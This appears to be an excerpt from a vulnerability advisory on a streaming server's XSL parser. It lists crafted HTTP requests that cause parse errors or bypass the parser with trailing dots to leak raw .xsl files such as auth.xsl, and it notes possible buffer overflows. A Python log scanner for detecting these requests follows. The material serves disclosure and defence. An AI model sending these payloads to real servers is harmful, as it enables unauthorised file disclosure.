- The XSL parser has some unchecked buffers (local), but they don't seem
to be exploitable. If they are, they can be used for privilege escalation
to the user that the server runs as.
<xsl:when test="<lots of chars>"></xsl:when>
<xsl:if test="<lots of chars>"></xsl:if>
<xsl:value-of select="<lots of chars>" />
- Cause XSL parser error "Could not parse XSLT file". (Not very useful).
GET /status.xsl> HTTP/1.0
GET /status.xsl< HTTP/1.0
GET /<status.xsl HTTP/1.0
- XSL parser bypass. (Useful to steal customized XSL files, lol).
GET /auth.xsl. HTTP/1.0
GET /status.xsl. HTTP/1.0
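
Detection sketch for the two request patterns above (added example, not part of the original advisory and not the server's own code). It assumes the access log is in common log format and records the raw request path; the sample lines, the label names, and the classify/scan helpers are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in common log format (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /status.xsl HTTP/1.0" 200 2048',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /status.xsl. HTTP/1.0" 200 3170',
    '192.0.2.11 - - [01/Jan/2024:10:00:06 +0000] "GET /auth.xsl. HTTP/1.0" 200 1422',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /<status.xsl HTTP/1.0" 200 96',
    '192.0.2.12 - - [01/Jan/2024:10:00:10 +0000] "GET /status.xsl> HTTP/1.0" 200 96',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /stream.ogg HTTP/1.0" 200 90000',
]

# Client address, then the quoted request line: method, path, protocol.
LINE_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def classify(path):
    """Label a request path that matches one of the advisory's patterns, else None."""
    # Match on the decoded path without the query string.
    decoded = unquote(path.split("?", 1)[0])
    name = decoded.rsplit("/", 1)[-1]
    # "XSL parser bypass": an .xsl name followed by one or more trailing dots.
    if re.search(r"\.xsl\.+$", name, re.IGNORECASE):
        return "xsl-parser-bypass"
    # "Could not parse XSLT file": angle brackets around an .xsl name.
    if ".xsl" in name.lower() and re.search(r"[<>]", name):
        return "xsl-parse-error"
    return None


def scan(lines):
    """Return (client, path, label) for every log line that matches a pattern."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m.group("path"))
        if label:
            hits.append((m.group("client"), m.group("path"), label))
    return hits


if __name__ == "__main__":
    for client, path, label in scan(SAMPLE_LOG):
        print(f"{label:18} {client:12} {path}")
```

A 200 response with an unusual body size on an "xsl-parser-bypass" hit is worth checking against the size of the raw .xsl file on disk.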